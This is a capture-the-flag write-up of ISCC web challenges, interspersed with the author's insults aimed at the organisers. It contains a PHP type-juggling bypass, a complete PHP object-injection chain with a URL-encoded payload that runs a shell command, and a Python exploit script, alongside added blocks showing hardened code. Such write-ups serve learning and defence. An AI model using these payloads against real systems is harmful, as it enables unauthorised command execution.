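If I ever play ISCC again, I'm a dumbass.
Oh wait, there won't be a next time. Good.
I thought there would be some improvement this year, but it's still the same. I suggest renaming it PYCC from now on. Damn it, this is exactly how the atmosphere gets ruined year after year.
It's all PY (backroom deals) anyway, and even solving every category doesn't win a prize. Updated irregularly.
No more Misc updates, it's not interesting (actually I just can't do blockchain...).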
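I. Practice round:
1. ISCC Customer Service Go Go Go (1):
A sign-in challenge. In theory there are three ways to do it.
There is a function.js containing obfuscated JS code, so the first approach would presumably be deobfuscation?
The other two can really be counted as one: use the console.
Once it is opened, the page automatically drops into Debug; you can actually just auto-click.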

A Baidu search turns up plenty of these:
setInterval(function(){document.getElementById("left_button").click();},1);
Of course you can also search in the Console: there is a votes variable, so just set it directly and you're done.


2. What is this:
What is this? What the hell is this. Damn, even recruitment contests don't set challenges like this anymore.

3. Web01:
This one is also a dumb challenge.

robots.txt pointed me to the path /src/code/code.txt, but the source is actually under /code/code.txt:
<?php
if (isset ($_GET['password'])) {
    if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>
No thinking needed, just bypass it with scientific notation.
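Why the two checks above do not hold, shown next to a stricter form (an added example, not the challenge's code; `weak_check`, `strict_check` and the sample inputs are constructed for illustration):

```php
<?php
// Added example, not the challenge's code; the inputs are constructed.

// The challenge's two comparisons, reduced to a status string.
function weak_check(string $p): string {
    // preg_match() returns 1 or 0; FALSE only signals a regex error,
    // so this branch is never taken for ordinary input.
    if (preg_match("/^[a-zA-Z0-9]+$/", $p) === FALSE) {
        return "not alphanumeric";
    }
    // Loose comparison: a numeric string such as "1e9" is compared as a
    // number, so a 3-character value can exceed 9999999.
    if (strlen($p) < 8 && $p > 9999999) {
        return "inner branch reached";
    }
    return "invalid";
}

// Stricter form: test the regex result against 1, anchor with \A...\z, and
// only compare numerically once the value is known to be plain digits.
function strict_check(string $p): string {
    if (preg_match('/\A[a-zA-Z0-9]+\z/', $p) !== 1) {
        return "not alphanumeric";
    }
    if (!ctype_digit($p)) {
        return "invalid";
    }
    // With digits only, "shorter than 8" and "greater than 9999999" can no
    // longer both hold, which exposes the condition as contradictory.
    if (strlen($p) < 8 && (int)$p > 9999999) {
        return "inner branch reached";
    }
    return "invalid";
}

foreach (["1234567", "1e9", "12 34"] as $p) {
    printf("%-8s weak=%-22s strict=%s\n", $p, weak_check($p), strict_check($p));
}
```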

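4. Login:
Damn, this is the challenge I most want to curse at. If you don't know how to write challenges, then don't write them, OK?
First, that admin account could actually be logged into with the weak password 123456. I was seriously speechless. A QQ number and a phone number were sitting right there, so I thought social engineering was required; in the backend, decoding that image gives the flag.
Then there is also a /www.zip. After downloading it, it turns out to be piapiapia from 0CTF, used without changing a thing. Unbelievable.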

5. which is the true iscc:
This one at least took a bit of thought.
Source audit:
<?php
session_start();
ini_set('max_execution_time', '5');
set_time_limit(5);
$status = "new";
$cmd = "whoami";
$is_upload = false;
$is_unser_finished = false;
$iscc_file = NULL;
class ISCC_Upload {
    function __wakeup() {
        global $cmd;
        global $is_upload;
        $cmd = "whoami";
        $_SESSION['name'] = randstr(14);
        $is_upload = (count($_FILES) > 0);
    }
    function __destruct() {
        global $is_upload;
        global $status;
        global $iscc_file;
        $status = "upload_fail";
        if ($is_upload) {
            foreach ($_FILES as $key => $value)
                $GLOBALS[$key] = $value;
            if(is_uploaded_file($iscc_file['tmp_name'])) {
                $check = @getimagesize($iscc_file["tmp_name"]);
                if($check !== false) {
                    $target_dir = "/var/tmp/";
                    $target_file = $target_dir . randstr(10);
                    if (file_exists($target_file)) {
                        echo "想啥呢?有东西了……<br>";
                        finalize();
                        exit;
                    }
                    if ($iscc_file["size"] > 500000) {
                        echo "东西塞不进去~<br>";
                        finalize();
                        exit;
                    }
                    if (move_uploaded_file($iscc_file["tmp_name"], $target_file)) {
                        echo "我拿到了!<br>";
                        $iscc_file = $target_file;
                        $status = "upload_ok";
                    } else {
                        echo "拿不到:(<br>";
                        finalize();
                        exit;
                    }
                } else {
                    finalize();
                    exit;
                }
            } else {
                echo "你真是个天才!<br>";
                finalize();
                exit;
            }
        }
    }
}
class ISCC_ResetCMD {
    protected $new_cmd = "echo '新新世界,发号施令!'";
    function __wakeup() {
        global $cmd;
        global $is_upload;
        global $status;
        $_SESSION['name'] = randstr(14);
        $is_upload = false;
        if(!isset($this->new_cmd)) {
            $status = "error";
            $error = "你这罐子是空的!";
            throw new Exception($error);
        }
        if(!is_string($this->new_cmd)) {
            $status = "error";
            $error = '东西都没给对!';
            throw new Exception($error);
        }
    }
    function __destruct() {
        global $cmd;
        global $status;
        $status = "reset";
        if($_SESSION['name'] === 'isccIsCciScc1scc') {
            $cmd = $this->new_cmd;
        }
    }
}
class ISCC_Login {
    function __wakeup() {
        $this->login();
    }
    function __destruct() {
        $this->logout();
    }
    function login() {
        $flag = file_get_contents("/flag");
        $pAssM0rd = hash("sha256", $flag);
        if($_GET['pAssM0rd'] === $pAssM0rd)
            $_SESSION['name'] = "isccIsCciScc1scc";
    }
    function logout() {
        global $status;
        unset($_SESSION['name']);
        $status = "finish";
    }
}
class ISCC_TellMeTruth {
    function __wakeup() {
        if(!isset($_SESSION['name']))
            $_SESSION['name'] = randstr(14);
        echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
    }
    function __destruct() {
        echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
    }
}
class ISCC_Command {
    function __wakeup() {
        global $cmd;
        global $is_upload;
        $_SESSION['name'] = randstr(14);
        $is_upload = false;
        $cmd = "whoami";
    }
    function __toString() {
        global $cmd;
        return "看看你干的好事: {$cmd} <br>";
    }
    function __destruct() {
        global $cmd;
        global $status;
        global $is_unser_finished;
        $status = "cmd";
        if($is_unser_finished === true) {
            echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
            echo "<span style='color:blue'>";
            @system($cmd);
            echo "</span>";
        }
    }
}
function randstr($len)
{
    $characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_=';
    $randstring = '';
    for ($i = 0; $i < $len; $i++) {
        $randstring .= $characters[rand(0, strlen($characters))];
    }
    return $randstring;
}
function waf($s) {
    if(stripos($s, "*") !== FALSE)
        return false;
    return true;
}
function finalize() {
    $cmd = "";
    $is_upload = false;
    unset($_SESSION);
    @unlink($iscc_file);
    $status = "finish";
    echo "<img src='whichisthetrueiscc.gif'><br>";
}
if(isset($_GET['whatareyounongshane'])) {
    $whatareyounongshane = $_GET['whatareyounongshane'];
    switch ($whatareyounongshane) {
        case "src":
            highlight_file(__FILE__);
            break;
        case "cmd":
            echo "想越级干好事?还是有门的……";
            header('Location: /?%3f=O:12:"ISCC_Command":0:{}');
            break;
        case "reset":
            echo "几辈子积累的好运就在这时~:p";
            header('Location: /?%3f=O:13:"ISCC_ResetCMD":1:{}');
            break;
        case "upload":
            $resp = <<<EOF
<form action="/index.php?%3f=O:11:%22ISCC_Upload%22:0:{}" method="post" enctype="multipart/form-data">
<input type="file" name="iscc_file">
<input type="submit" value="Upload Image" name="submit">
</form>
EOF;
            echo $resp;
            break;
        case "tellmetruth":
            echo base64_decode("PGltZyBzcmM9J3RlbGxtZXRydXRoLmdpZic+Cg==");
            header('Location: /?%3f=O:14:"ISCC_TellMeTruth":0:{}');
            break;
        default:
            echo "空空如也就是我!";
    }
    finalize();
    die("所以哪个ISCC是真的?<br>");
}
if(isset($_GET['?'])) {
    $wtf = waf($_GET{'?'}) ? $_GET['?'] : (finalize() && die("试试就“逝世”!"));
    if($goodshit = @unserialize($wtf)) {
        $is_unser_finished = true;
    }
    if(in_array($status, array('new', 'cmd', 'upload_ok', 'upload_fail', 'reset'), true))
        finalize();
    die("所以哪个ISCC是真的?<br>");
}
?>
The main logic is in __destruct() of ISCC_Command:
function __destruct() {
    global $cmd;
    global $status;
    global $is_unser_finished;
    $status = "cmd";
    if($is_unser_finished === true) {
        echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
        echo "<span style='color:blue'>";
        @system($cmd);
        echo "</span>";
    }
}
Looking for where $cmd gets set, __destruct() of ISCC_ResetCMD has this:
function __destruct() {
    global $cmd;
    global $status;
    $status = "reset";
    if($_SESSION['name'] === 'isccIsCciScc1scc') {
        $cmd = $this->new_cmd;
    }
}
The key is this $_SESSION['name']. Looking further, there is something in ISCC_Login:
function login() {
    $flag = file_get_contents("/flag");
    $pAssM0rd = hash("sha256", $flag);
    if($_GET['pAssM0rd'] === $pAssM0rd)
        $_SESSION['name'] = "isccIsCciScc1scc";
}
But this is a trap: the value obviously cannot be obtained through login(). So where does it come from?
From __destruct() of ISCC_Upload:
foreach ($_FILES as $key => $value)
    $GLOBALS[$key] = $value;
So when uploading the image, just send a text part along with it to overwrite the value.
Something like this:
Content-Disposition: form-data; name="_SESSION"; filename="isccIsCciScc1scc"
Content-Type: text/plain

1ndweb
Now for the serialization order.
From the analysis it is clear that only 3 classes are used in total, so simply:
ISCC_Upload() => ISCC_ResetCMD() => ISCC_Command()
Then there is waf().
Bypass it directly with an uppercase S plus hex encoding.
<?php
class ISCC_Upload {
    public $status;
}
class ISCC_Command {
}
class ISCC_ResetCMD {
    public $cmd;
    public $status;
    protected $new_cmd = "cat /flag";
}
$a = new ISCC_Upload();
$a->status = new ISCC_ResetCMD();
$a->status->cmd = new ISCC_Command();
$b = serialize($a);
echo urlencode($b);
//
The final query string:
?%3F=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D
Just write a script and run it:
import requests

targeturl = "http://39.96.91.106:7050/"
files = {
    'iscc_file': ("b", open("1.jpg", "rb")),
    "_SESSION": ("isccIsCciScc1scc", "1ndweb"),
}
headers = {
    'Cookie': "PHPSESSID=fe2967c292ff6fcc72f8c2b73970fb2f",
}
r = requests.post(url=targeturl + "?%3F=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D", files=files, headers=headers)
print(r.text)
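
The two gaps used in this challenge, the raw-string waf() and the $_FILES-to-$GLOBALS copy, shown with stricter counterparts (an added example, not the challenge's code; `waf_normalized`, `safe_unserialize`, `pick_upload` and the sample data are constructed for illustration):

```php
<?php
// Added example, not the challenge's code; all inputs are constructed.

// The challenge's filter as written: it only inspects the raw request string.
function waf(string $s): bool {
    return stripos($s, "*") === false;
}

// unserialize() decodes \xx hex escapes inside S:<len>:"..." strings, so a deny
// filter has to look at the decoded bytes. Decoding every \xx over-approximates,
// which is the safe direction for a filter.
function waf_normalized(string $s): bool {
    $decoded = preg_replace_callback(
        '/\\\\([0-9a-fA-F]{2})/',
        function ($m) { return chr(hexdec($m[1])); },
        $s
    );
    return stripos($decoded, "*") === false;
}

// Stronger fix: never instantiate classes from request data. Objects come back
// as __PHP_Incomplete_Class, so no application __wakeup()/__destruct() runs.
function safe_unserialize(string $s) {
    return unserialize($s, ['allowed_classes' => false]);
}

// Replacement for copying every $_FILES key into $GLOBALS: read the one
// expected field and report any other part names instead of trusting them.
function pick_upload(array $files, string $field): array {
    $unexpected = array_values(array_diff(array_keys($files), [$field]));
    return ['file' => $files[$field] ?? null, 'unexpected' => $unexpected];
}

// Constructed sample: protected property name written with S: hex escapes.
$sample = 'O:13:"ISCC_ResetCMD":1:{S:10:"\00\2a\00new_cmd";s:5:"hello";}';
// Constructed stand-in for $_FILES with one extra part named like a superglobal.
$files = ['iscc_file' => ['name' => 'a.jpg'], '_SESSION' => ['name' => 'x']];

var_dump(waf($sample));
var_dump(waf_normalized($sample));
var_dump(safe_unserialize($sample) instanceof __PHP_Incomplete_Class);
var_dump(pick_upload($files, 'iscc_file')['unexpected']);
```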

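II. Arena round:
1. tornado:
Idiots. They recycled a challenge from the 2018 Huwang Cup (护网杯) to pad things out. If that's how it works, wouldn't it be even better for me to just put up challenges from foreign CTFs? Hardly anyone plays those anyway, and Baidu can't even find them.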
